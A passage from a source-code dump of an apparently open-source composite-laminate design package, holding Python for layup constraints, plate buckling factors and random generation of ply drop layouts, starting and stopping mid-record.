indices\r\n        for index, angle in enumerate(self.angles_bal[:, 0]):\r\n            self.indices_bal[angle] = index\r\n\r\n        # number of allowed fibre orientations\r\n        self.n_set_of_angles = len(set(set_of_angles))\r\n        if self.n_set_of_angles != len(set_of_angles):\r\n            raise Exception(\"\"\"\r\nRepeated angles in the set of allowed fibre orientations set_of_angles\"\"\")\r\n\r\n        # useful data to implement the 10% rule\r\n        self.angles_10 = [0, 90, 45, -45]\r\n        # dictionary to retrieve indices related to the 10% rule\r\n        self.indices_10 = dict()\r\n        for index, angle in enumerate(self.angles_10):\r\n            self.indices_10[angle] = index\r\n\r\n        # useful data to avoid repetitive calculations of cosines and sines\r\n        self.cos_sin = np.empty((self.n_set_of_angles, 4), float)\r\n        for ind_angle, angle in enumerate(self.set_of_angles):\r\n            self.cos_sin[ind_angle, :] = np.hstack((\r\n                np.cos(np.deg2rad(2*float(angle))),\r\n                np.cos(np.deg2rad(4*float(angle))),\r\n                np.sin(np.deg2rad(2*float(angle))),\r\n                np.sin(np.deg2rad(4*float(angle)))))\r\n\r\n\r\n    def __repr__(self):\r\n        " Display object "\r\n        return f\"\"\"\r\nConstraints\r\n    Symmetry : {self.sym}\r\n    Balance requirement : {self.bal}\r\n    Out-of-plane orthotropy requirement : {self.oopo}\r\n    Damage tolerance constraint : 
{self.dam_tol}\r\n Damage tolerance rule : {self.dam_tol_rule}\r\n Covering : {self.covering}\r\n Number of plies for covering rule : {self.n_covering}\r\n 10 percent rule : {self.rule_10_percent}\r\n rule applied by restricting LPs : {self.rule_10_percent and self.rule_10_Abdalla}\r\n rule applied by restricting ply percentages : {self.rule_10_percent and not self.rule_10_Abdalla}\r\n percentage limit for the rule applied on LPs : {self.percent_Abdalla*100:.2f} %\r\n percentage 0 : {self.percent_0*100:.2f} %\r\n percentage 45 : {self.percent_45*100:.2f} %\r\n percentage 90 : {self.percent_90*100:.2f} %\r\n percentage -45 : {self.percent_135*100:.2f} %\r\n percentage +-45 : {self.percent_45_135*100:.2f} %\r\n Disorientation rule : {self.diso}\r\n delta_angle : {self.delta_angle}\r\n Contiguity rule : {self.contig}\r\n n_contig : {self.n_contig}\r\n Set of angles : {self.set_of_angles}\r\n Number of allowed fibre orientations: {self.n_set_of_angles}\r\n Ply drop spacing rule: {self.pdl_spacing}\r\n Minimum number of plies between ply drops region: {self.min_drop}\r\n\"\"\"\r\n\r\nclass ConstraintDefinitionError(Exception):\r\n \" Errors during the constraints definition\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n constraints = Constraints(set_of_angles=[0, 45, -30, -45, 30, 60, -60, 90])\r\n print(constraints)\r\n"
},
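One detail of constraints.py worth isolating: the constructor precomputes cos(2θ), cos(4θ), sin(2θ) and sin(4θ) for every allowed fibre orientation so that later lamination-parameter evaluations never repeat the trigonometry. A standalone sketch of that table, using the class's default angle set:

```python
import numpy as np

set_of_angles = np.array([-45, 0, 45, 90])  # default angle set of the class
cos_sin = np.empty((set_of_angles.size, 4), float)
for ind_angle, angle in enumerate(set_of_angles):
    rad2 = np.deg2rad(2.0 * angle)
    rad4 = np.deg2rad(4.0 * angle)
    # one row per angle: cos(2t), cos(4t), sin(2t), sin(4t)
    cos_sin[ind_angle] = [np.cos(rad2), np.cos(rad4), np.sin(rad2), np.sin(rad4)]
print(cos_sin.round(3))
```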
{
"alpha_fraction": 0.4753764271736145,
"alphanum_fraction": 0.5827280879020691,
"avg_line_length": 37.20833206176758,
"blob_id": "942bc423ec34ba89fce7d3a780f626d910015fbd",
"content_id": "aae1013f71471a7d51d046d44cee92904592290c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11290,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 288,
"path": "/src/buckling/buckling.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate buckling resistance\r\n\r\n- buckling_margin\r\n calculates buckling margins from src.buckling factors\r\n\r\n- buckling_factor_ss\r\n calculates the critical buckling factor of a simply-supported orthotropic\r\n laminate plate based on the stacking sequqnce\r\n\r\n- buckling_factor_lampam\r\n calculates the critical buckling factor of a simply-supported orthotropic\r\n laminate plate based on lamination parameters\r\n\r\n- buckling_factor_m_n\r\n returns the buckling factor of a simply-supported orthotropic laminate\r\n for a specific buckling mode, based on out-of-plane stiffnesses\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport math\r\nimport numpy as np\r\nfrom src.BELLA.materials import Material\r\nfrom src.CLA.lampam_functions import calc_lampam\r\n\r\ndef buckling_margin(buckling_factor):\r\n 'calculates buckling margins from src.buckling factors'\r\n return 100*(buckling_factor - 1)\r\n\r\n\r\ndef buckling_factor_ss(ss, N_x, N_y, length_x, length_y, mat, n_modes=10):\r\n \"\"\"\r\n calculates the critical buckling factor of a simply-supported orthotropic\r\n laminate plate based on the stacking sequqnce\r\n\r\n INPUT\r\n\r\n - ss: stacking sequence of the laminate\r\n - mat: material properties\r\n - length_x: plate dimensions (x-direction)\r\n - length_y: plate dimensions (y-direction)\r\n - N_x: compressive loading intensity in the x-direction\r\n - N_y: compressive loading intensity in the x-direction\r\n - n_modes: number of buckling modes to be tested\r\n \"\"\"\r\n lampam_1 = calc_lampam(ss)\r\n n_plies = ss.size\r\n return buckling_factor(\r\n lampam_1, mat, n_plies, N_x=N_x, N_y=N_y,\r\n length_x=length_x, length_y=length_y, n_modes=n_modes)\r\n\r\n\r\ndef buckling_factor(\r\n lampam, mat, n_plies, N_x=0, N_y=0, length_x=1, length_y=1, n_modes=10):\r\n \"\"\"\r\n calculates the critical buckling factor of a simply-supported orthotropic\r\n laminate plate based on lamination parameters\r\n\r\n INPUT\r\n\r\n - lampam: lamination parameters\r\n - mat: material properties\r\n - length_x: plate dimensions (x-direction)\r\n - length_y: plate dimensions (y-direction)\r\n - N_x: compressive loading intensity in the x-direction\r\n - N_y: compressive loading intensity in the x-direction\r\n - n_modes: number of buckling modes to be tested\r\n \"\"\"\r\n buck = np.zeros((n_modes, n_modes), dtype=float)\r\n a = (1/12)*((n_plies*mat.ply_t)**3)\r\n if lampam.size == 12:\r\n D11 = a * (mat.U1 + mat.U2*lampam[8] + mat.U3*lampam[9])\r\n D12 = a *(-mat.U3*lampam[9] + mat.U4)\r\n D22 = a *(mat.U1 - mat.U2*lampam[8] + mat.U3*lampam[9])\r\n D66 = a *(-mat.U3*lampam[9] + mat.U5)\r\n else:\r\n D11 = a * (mat.U1 + mat.U2*lampam[0] + mat.U3*lampam[1])\r\n D12 = a *(-mat.U3*lampam[1] + mat.U4)\r\n D22 = a *(mat.U1 - mat.U2*lampam[0] + mat.U3*lampam[1])\r\n D66 = a *(-mat.U3*lampam[0] + mat.U5)\r\n for mode_m in range(n_modes):\r\n for mode_n in range(n_modes):\r\n buck[mode_m, mode_n] = buckling_factor_m_n(\r\n D11, D12, D22, D66,\r\n mode_m=mode_m + 1,\r\n mode_n=mode_n + 1,\r\n N_x=N_x, N_y=N_y,\r\n length_x=length_x,\r\n length_y=length_y)\r\n return np.min(buck)\r\n\r\n\r\ndef buckling_factor_m_n(\r\n D11, D12, D22, D66, mode_m=1, mode_n=1,\r\n N_x=0, N_y=0, length_x=1, length_y=1):\r\n \"\"\"\r\n returns the buckling factor of a simply-supported orthotropic laminate\r\n for a specific buckling mode, based on out-of-plane stiffnesses\r\n\r\n INPUT\r\n\r\n - D11, D12, D22 and D66: out-of-plane 
stifnesses\r\n - length_x: plate dimensions (x-direction)\r\n - length_y: plate dimensions (y-direction)\r\n - N_x: compressive loading intensity in the x-direction\r\n - N_y: compressive loading intensity in the x-direction\r\n - mode_m: buckling mode (number of half-waves) in the x direction\r\n - mode_n: buckling mode (number of half-waves) in the y direction\r\n \"\"\"\r\n alpha = (mode_m/length_x)**2\r\n beta = (mode_n/length_y)**2\r\n return (math.pi**2)*(D11*alpha**2 \\\r\n + 2*(D12 + 2*D66)*alpha*beta \\\r\n + D22*beta**2)/(alpha*abs(N_x) + beta*abs(N_y))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the functions buckling_factor_ss ***\\n')\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n\r\n # panel 17\r\n ss = np.array([45, 60, 45, 90, 90, -45, -60, -45, 0]) # panel 17 Irisarri 1\r\n ss = np.array([60, -60, 60, -60, 60, -60, -75, 60, 75]) # panel 17 Adams\r\n ss = np.array([45, -45, 45, -45, 45, -45, 60, -60, 60, -30]) # panel 17 Serestra\r\n N_x = 1000*0.175127*320\r\n N_y = 1000*0.175127*180\r\n length_x = 20*(25.40/1000)\r\n length_y = 12*(25.40/1000)\r\n# # panel 7\r\n# N_x = 1000*0.175127*290\r\n# N_y = 1000*0.175127*195\r\n# length_x = 20*(25.40/1000)\r\n# length_y = 12*(25.40/1000)\r\n# ss = np.array([45, 60, 45, 90, 90, -45, -60, -45, 0]) # panel 7 Irisarri 1\r\n# ss = np.array([60, -60, 60, -60, 60, -60, -75, 60, 75]) # panel 7 Adams\r\n# ss = np.array([45, -45, 45, -45, 45, -45, 60, -60, 60, -30]) # panel 7 Serestra\r\n # panel 5\r\n ss = np.array([45, -45, 45, -45, 45, -45, 60, -60]) # panel 5 Serestra\r\n ss = np.array([-60, -60, -60, -60, -60, -60, -60, -60]) # my test\r\n N_x = 1000*0.175127*210\r\n N_y = 1000*0.175127*100\r\n length_x = 20*(25.40/1000)\r\n length_y = 12*(25.40/1000)\r\n ss = np.hstack((ss, np.flip(ss, axis=0)))\r\n print(ss)\r\n buck = buckling_factor_ss(ss, N_x, N_y, length_x, length_y, mat, n_modes=10)\r\n print(f'Buckling factor : {buck }\\n')\r\n print(f'Buckling margin : {buckling_margin(buck)}\\n')\r\n\r\n\r\n print('*** Test for the functions buckling_factor ***\\n')\r\n # Lamination paraneters calculation\r\n ss = np.array([-30, 30, 45, -45, 45, 60, -60,\r\n 60, -60, 60, -60, -75, 60, 75])\r\n n_plies = ss.size\r\n lampam = calc_lampam(ss)\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n # Loading intensities\r\n N_x = 1000*0.175127*375\r\n N_y = 1000*0.175127*360\r\n length_x = 18*(25.40/1000)\r\n length_y = 24*(25.40/1000)\r\n buck = buckling_factor(lampam, mat, n_plies, N_x=N_x, N_y=N_y,\r\n 
length_x=length_x, length_y=length_y)\r\n print(f'Buckling factor : {buck}\\n')\r\n print(f'Buckling margin : {buckling_margin(buck)}\\n')\r\n\r\n print('*** Test for the functions buckling_factor_m_n ***\\n')\r\n # Lamination paraneters calculation\r\n ss = np.array([-30, 30, 45, -45, 45, 60, -60,\r\n 60, -60, 60, -60, -75, 60, 75])\r\n n_plies = ss.size\r\n lampam = calc_lampam(ss)\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n # Loading intensities\r\n N_x = 1000*0.175127*375\r\n N_y = 1000*0.175127*360\r\n length_x = 18*(25.40/1000)\r\n length_y = 24*(25.40/1000)\r\n # Buckling modes\r\n mode_m = 1\r\n mode_n = 1\r\n # out-of-plane stiffnesses\r\n a = (1/12)*((n_plies*mat.ply_t)**3)\r\n D11 = a * (mat.U1 + mat.U2*lampam[8] + mat.U3*lampam[9])\r\n D12 = a *(-mat.U3*lampam[9] + mat.U4)\r\n D22 = a *(mat.U1 - mat.U2*lampam[8] + mat.U3*lampam[9])\r\n D66 = a *(-mat.U3*lampam[9] + mat.U5)\r\n buck = buckling_factor_m_n(D11, D12, D22, D66,\r\n mode_m=mode_m, mode_n=mode_n, N_x=N_x, N_y=N_y,\r\n length_x=length_x, length_y=length_y)\r\n print(f'Buckling factor : {buck}\\n')\r\n print(f'Buckling margin : {buckling_margin(buck)}\\n')\r\n\r\n\r\n print('*** Test for the functions buckling_factor ***\\n')\r\n # panel 18 terence\r\n n_plies = 22\r\n lampam = np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.469, -0.335, 0, 0])\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n # Loading intensities\r\n N_x = 1000*0.175127*(-300)\r\n N_y = 1000*0.175127*(-410)\r\n length_x = 20*(25.40/1000)\r\n length_y = 12*(25.40/1000)\r\n buck = buckling_factor(lampam, mat, n_plies, N_x=N_x, N_y=N_y,\r\n length_x=length_x, length_y=length_y)\r\n print(f'1 - buckling factor : {1 - buck}\\n')\r\n\r\n # panel 18 moi\r\n n_plies = 22\r\n lampam = np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.416, -0.451, 0, 0])\r\n # Elastic modulus in the fibre direction in Pa\r\n E11 = 20.5/1.45038e-10 # 141 GPa\r\n # Elastic modulus in the transverse direction in Pa\r\n E22 = 1.31/1.45038e-10 # 9.03 GPa\r\n # Poisson's ratio relating transverse deformation and axial loading (-)\r\n nu12 = 0.32\r\n # In-plane shear modulus in Pa\r\n G12 = 0.62/1.45038e-10 # 4.27 GPa\r\n # Density in g/m2\r\n density_area = 300.5\r\n # Ply thickness in m\r\n ply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n # Loading intensities\r\n N_x = 1000*0.175127*(-300)\r\n N_y = 1000*0.175127*(-410)\r\n length_x = 20*(25.40/1000)\r\n length_y = 12*(25.40/1000)\r\n buck 
= buckling_factor(lampam, mat, n_plies, N_x=N_x, N_y=N_y,\r\n length_x=length_x, length_y=length_y)\r\n print(f'1 - buckling factor : {1 - buck}\\n')"
},
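The record above fully spells out the closed-form criterion it implements, so a tiny standalone sketch can illustrate it; the stiffness and loading numbers below are made-up placeholders, not values taken from the record:

```python
import math

def buckling_factor_m_n(D11, D12, D22, D66, m=1, n=1,
                        N_x=0.0, N_y=0.0, a=1.0, b=1.0):
    """Buckling factor of mode (m, n) for a simply-supported orthotropic
    plate of dimensions a x b, as in the record's buckling_factor_m_n."""
    alpha = (m / a) ** 2
    beta = (n / b) ** 2
    return (math.pi ** 2) * (D11 * alpha ** 2
                             + 2 * (D12 + 2 * D66) * alpha * beta
                             + D22 * beta ** 2) / (alpha * abs(N_x) + beta * abs(N_y))

# critical factor = minimum over the first few modes (n_modes=10 in the record)
D11, D12, D22, D66 = 60.0, 20.0, 40.0, 25.0   # placeholder stiffnesses in N.m
crit = min(buckling_factor_m_n(D11, D12, D22, D66, m, n,
                               N_x=1e4, N_y=5e3, a=0.5, b=0.3)
           for m in range(1, 11) for n in range(1, 11))
print(crit, 100 * (crit - 1))   # factor and margin; margin > 0 means no buckling
```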
{
"alpha_fraction": 0.5588285326957703,
"alphanum_fraction": 0.5668545365333557,
"avg_line_length": 36.91029739379883,
"blob_id": "0aaf8989294b5b18d72bddda4ea0acf51daac881",
"content_id": "d7f2f941d3179f8ddf24207bd59a1cfeac53c741",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11712,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 301,
"path": "/src/BELLA/pdl_group.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions used to generate manufacturable ply drop layouts with guide-based\r\nblending\r\n\r\n- format_ply_drops and format_ply_drops2\r\n format the ply drop layouts\r\n\r\n- ply_drops_rules\r\n deletes the ply drop layouts that does not satisfy the ply drop guidelines\r\n\r\n- randomly_pdl_guide\r\n randomly generates manufacturable ply drop layouts\r\n\r\nGuidelines:\r\n1: The first two outer plies should not be stopped\r\n2: The number of ply drops should be minimal (not butt joints)\r\n3: The ply drops should be distributed as evenly as possible along the\r\n thickness of the laminates\r\n4: If this is not exactly possible the ply drops should rather be\r\n concentrated in the larger groups (because smaller groups have a\r\n smaller design space)\r\n5: Then ply drops away from the middle plane are prefered to limit fibre\r\n waviness\r\n\"\"\"\r\nimport sys\r\nimport time\r\nimport random\r\nimport numpy as np\r\nimport scipy.special\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\nfrom src.BELLA.pdl_tools import format_ply_drops\r\nfrom src.BELLA.pdl_tools import ply_drops_at_each_boundaries\r\nfrom src.BELLA.pdl_tools import format_ply_drops2\r\n\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\ndef randomly_pdl_guide(\r\n boundaries,\r\n n_ply_drops,\r\n n_max,\r\n parameters,\r\n obj_func_param,\r\n constraints,\r\n multipanel,\r\n n_pdl_max=1,\r\n pdl_before=None,\r\n pdl_after=None,\r\n last_group=False,\r\n covering_top=False,\r\n covering_bottom=False,\r\n has_middle_ply=False,\r\n middle_ply_indices=np.array((), dtype='int16')):\r\n \"\"\"\r\n randomly generates ply drop layouts that best satisfy the spacing and\r\n stacking rules within a limited time.\r\n\r\n INPUTS\r\n - n_ply_drops: list of the number of ply drops for each group compared to\r\n the groups thickest of the thickest laminate\r\n - n_max: maximum number of plies for the group\r\n - n_pdl_max: number of ply drop layouts asked\r\n - pdl_before: matrix of ply drop layouts for the group placed above\r\n - pdl_after: matrix of ply drop layouts for the group placed below\r\n - last_group: true for the last groups\r\n - constraints: design guidelines\r\n - parameters: optimiser parameters\r\n - multpanel: multi-panel structure\r\n - obj_func_param: objective function parameters\r\n - if covering_top = True, the top ply cannot be dropped\r\n - if covering_bottom = True, the bottom ply cannot be dropped\r\n - has_middle_ply: True if a panel has a middle ply\r\n \"\"\"\r\n# print('boundaries', boundaries)\r\n# print('n_ply_drops', n_ply_drops)\r\n# print('n_max', n_max)\r\n# print('n_pdl_max', n_pdl_max)\r\n# print('last_group', last_group)\r\n# print('pdl_before', pdl_before)\r\n# print('has_middle_ply', has_middle_ply)\r\n# print('middle_ply_indices', middle_ply_indices)\r\n\r\n# # boundaries one panel to another by increasing order of thickness\r\n# boundaries = np.zeros((0, 2), dtype='int16')\r\n# for ind_panel in range(n_ply_drops.size - 1):\r\n# boundaries = np.vstack((\r\n# boundaries, np.array([ind_panel, ind_panel + 1], dtype='int16')))\r\n\r\n n_ply_drops_unique = np.unique(n_ply_drops)\r\n n_unique = n_ply_drops_unique.size\r\n # dictionary to retrieve indices related to the number of ply drops\r\n indices_unique = dict()\r\n 
for index, unique_index in enumerate(n_ply_drops_unique):\r\n indices_unique[unique_index] = index\r\n\r\n combi = []\r\n for drops in n_ply_drops_unique:\r\n # combi = list of the position that can take the ply drops per panel\r\n combi.append(scipy.special.comb(n_max, drops))\r\n\r\n n_pdl = int(min(np.product(combi), n_pdl_max))\r\n #print('n_pdl', n_pdl)\r\n # length of the group ply drop layout\r\n if last_group and has_middle_ply:\r\n n_maxx = n_max + 1\r\n else:\r\n n_maxx = n_max\r\n\r\n pdl_perfect = np.zeros((n_pdl, n_ply_drops.size, n_maxx), dtype=int)\r\n pdl_imperfect = np.zeros((n_pdl, n_ply_drops.size, n_maxx), dtype=int)\r\n p_spacing_imperfect = np.zeros((n_pdl,), dtype=float)\r\n\r\n ind_imperfect = 0\r\n ind_perfect = 0\r\n t_ini = time.time()\r\n elapsed_time = 0\r\n\r\n\r\n #print('n_pdl', n_pdl)\r\n while ind_perfect < n_pdl \\\r\n and elapsed_time < parameters.time_limit_group_pdl:\r\n #print('ind_perfect', ind_perfect)\r\n #print('ind_imperfect', ind_imperfect)\r\n\r\n # randomly chose a pdl\r\n new_pdl = [[]]*n_unique\r\n if covering_top and covering_bottom:\r\n new_pdl[n_unique - 1] = random.sample(\r\n range(1, n_max - 1), n_ply_drops_unique[n_unique - 1])\r\n elif covering_top:\r\n new_pdl[n_unique - 1] = random.sample(\r\n range(1, n_max), n_ply_drops_unique[n_unique - 1])\r\n elif covering_bottom:\r\n new_pdl[n_unique - 1] = random.sample(\r\n range(n_max - 1), n_ply_drops_unique[n_unique - 1])\r\n else:\r\n new_pdl[n_unique - 1] = random.sample(\r\n range(n_max), n_ply_drops_unique[n_unique - 1])\r\n\r\n # for guide-based blending, not generalised blending\r\n for ind_panel in range(n_unique - 1)[::-1]:\r\n new_pdl[ind_panel] = new_pdl[ind_panel + 1][:]\r\n n_to_del = n_ply_drops_unique[ind_panel + 1] \\\r\n - n_ply_drops_unique[ind_panel]\r\n to_del = random.sample(\r\n list(range(len(new_pdl[ind_panel]))), n_to_del)\r\n new_pdl[ind_panel] = [\r\n elem for ind_elem, elem in enumerate(new_pdl[ind_panel]) \\\r\n if ind_elem not in to_del]\r\n\r\n # Formatting the ply drop layout in the form as in the example:\r\n # [[0 1 2 3]\r\n # [-1 -1 2 3]\r\n # [-1 -1 -1 3]]\r\n # for a pdl with three panels\r\n # the first panel having the four plies of index 0, 1, 2, 3\r\n # the second panel having 2 plies of index 2 and 3\r\n # the last panel having only the ply of index 3\r\n #print('new_pdl', new_pdl)\r\n new_pdl = format_ply_drops(new_pdl, n_max)\r\n # <class 'numpy.ndarray'>\r\n# print('new_pdl')\r\n# print(new_pdl)\r\n\r\n if last_group and has_middle_ply:\r\n middle = -(middle_ply_indices[:-1] != 0).astype(int)\r\n# print('middle', middle)\r\n middle = middle.reshape((new_pdl.shape[0], 1))\r\n# print('middle', middle)\r\n new_pdl = np.hstack((new_pdl, middle))\r\n\r\n\r\n # Formatting the ply drop layout so that a ply drop scheme is\r\n # associated to each panel boundary\r\n new_pdl = ply_drops_at_each_boundaries(\r\n new_pdl, n_ply_drops_unique, indices_unique, n_ply_drops)\r\n # <class 'numpy.ndarray'>\r\n# print('new_pdl')\r\n# print(new_pdl)\r\n\r\n # Application ply drop spacing and stacking rules:\r\n # - Ply drops should be separated by at least min_drop plies\r\n\r\n # for the last groups of symmetric laminates\r\n if last_group and constraints.sym:\r\n if has_middle_ply:\r\n pdl_after = np.flip(np.copy(new_pdl[:, :-1]), axis=1)\r\n # print(new_pdl)\r\n else:\r\n pdl_after = np.flip(np.copy(new_pdl), axis=1)\r\n\r\n p_spacing = calc_penalty_spacing(\r\n pdl=new_pdl,\r\n pdl_before=pdl_before,\r\n pdl_after=pdl_after,\r\n multipanel=multipanel,\r\n 
obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n# print('p_spacing', p_spacing)\r\n # <class 'numpy.ndarray'>\r\n# print('new_pdl1')\r\n# print(new_pdl)\r\n\r\n # Formatting the ply drop layout in the form as in the example:\r\n # [[0 1 2 3]\r\n # [-1 -1 1 2]\r\n # [-1 -1 -1 1]]\r\n # for a pdl: with three panels\r\n # the first panel having the four plies of index 0, 1, 2, 3\r\n # the second panel having 2 plies of index 2 and 3\r\n # the last panel having only the ply of index 3\r\n new_pdl = format_ply_drops2(new_pdl).astype(int)\r\n # <class 'numpy.ndarray'>\r\n# print('new_pdl', new_pdl)\r\n\r\n elapsed_time = time.time() - t_ini\r\n\r\n # Store the new pdl if it is perfect (no violation of manufacturing\r\n # constraint) or if it is among the n_pdl best unmanufacturable\r\n # solutions found so far\r\n if p_spacing == 0:\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_perfect):\r\n if np.allclose(new_pdl, pdl_perfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n pdl_perfect[ind_perfect] = new_pdl\r\n ind_perfect += 1\r\n else:\r\n # To only keep the imperfect pdl with the smallest penalties\r\n if ind_imperfect >= n_pdl:\r\n if p_spacing < max(p_spacing_imperfect):\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_imperfect):\r\n if np.allclose(new_pdl, pdl_imperfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n indexx = np.argmin(p_spacing_imperfect)\r\n pdl_imperfect[indexx] = new_pdl\r\n p_spacing_imperfect[indexx] = p_spacing\r\n else:\r\n # To remove duplicates\r\n is_double = False\r\n for ind in range(ind_imperfect):\r\n if np.allclose(new_pdl, pdl_imperfect[ind]):\r\n is_double = True\r\n break\r\n if is_double:\r\n continue\r\n #print('is_double', is_double)\r\n# print(new_pdl)\r\n# print(ind_imperfect)\r\n# print(pdl_imperfect.shape)\r\n pdl_imperfect[ind_imperfect] = new_pdl\r\n p_spacing_imperfect[ind_imperfect] = p_spacing\r\n ind_imperfect += 1\r\n\r\n\r\n # if the time limit is reached\r\n if elapsed_time >= parameters.time_limit_group_pdl:\r\n\r\n pdl_imperfect = pdl_imperfect[:ind_imperfect]\r\n p_spacing_imperfect = p_spacing_imperfect[:ind_imperfect]\r\n #print('pdl_perfect', pdl_perfect)\r\n #print('pdl_imperfect', pdl_imperfect)\r\n\r\n if not ind_imperfect + ind_perfect:\r\n print('n_ply_drops', n_ply_drops)\r\n print('n_max', n_max)\r\n print('min_drop', constraints.min_drop)\r\n print('pdl_before', pdl_before)\r\n print('pdl_after', pdl_after)\r\n raise Exception(\"\"\"\r\nNo conform ply drop layout can be generated.\r\nToo many ply drops between two adjacent panels.\"\"\")\r\n\r\n\r\n # add the non-manufacturable ply drop layouts\r\n for ind in range(ind_perfect, n_pdl_max):\r\n indexx = np.argmin(p_spacing_imperfect)\r\n pdl_perfect[ind] = pdl_imperfect[indexx]\r\n p_spacing_imperfect[indexx] = 10e6\r\n\r\n return pdl_perfect\r\n # if enough manufacturable ply drop layouts have been found\r\n return pdl_perfect\r\n"
},
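A small illustrative sketch of the ply drop layout format described in the docstrings of the record above; `format_ply_drops_sketch` is a hypothetical stand-in for the record's `format_ply_drops` (whose real implementation lives in `src.BELLA.pdl_tools` and is not shown here):

```python
import numpy as np

def format_ply_drops_sketch(kept_plies_per_panel, n_max):
    """Mark dropped guide plies with -1; kept plies keep their guide index."""
    pdl = -np.ones((len(kept_plies_per_panel), n_max), dtype=int)
    for ind_panel, kept in enumerate(kept_plies_per_panel):
        for ply in kept:
            pdl[ind_panel, ply] = ply
    return pdl

# guide laminate with 4 plies; thinner panels keep a subset (guide-based blending)
print(format_ply_drops_sketch([[0, 1, 2, 3], [2, 3], [3]], 4))
# [[ 0  1  2  3]
#  [-1 -1  2  3]
#  [-1 -1 -1  3]]
```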
{
"alpha_fraction": 0.5562905669212341,
"alphanum_fraction": 0.569280743598938,
"avg_line_length": 34.29694366455078,
"blob_id": "f37c8f97e791b7f0be0f9b5013a5e31649e04aaf",
"content_id": "ef486d2e0873dee1e3afb775c65897316dc26e41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8314,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 229,
"path": "/src/BELLA/moments_of_areas.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
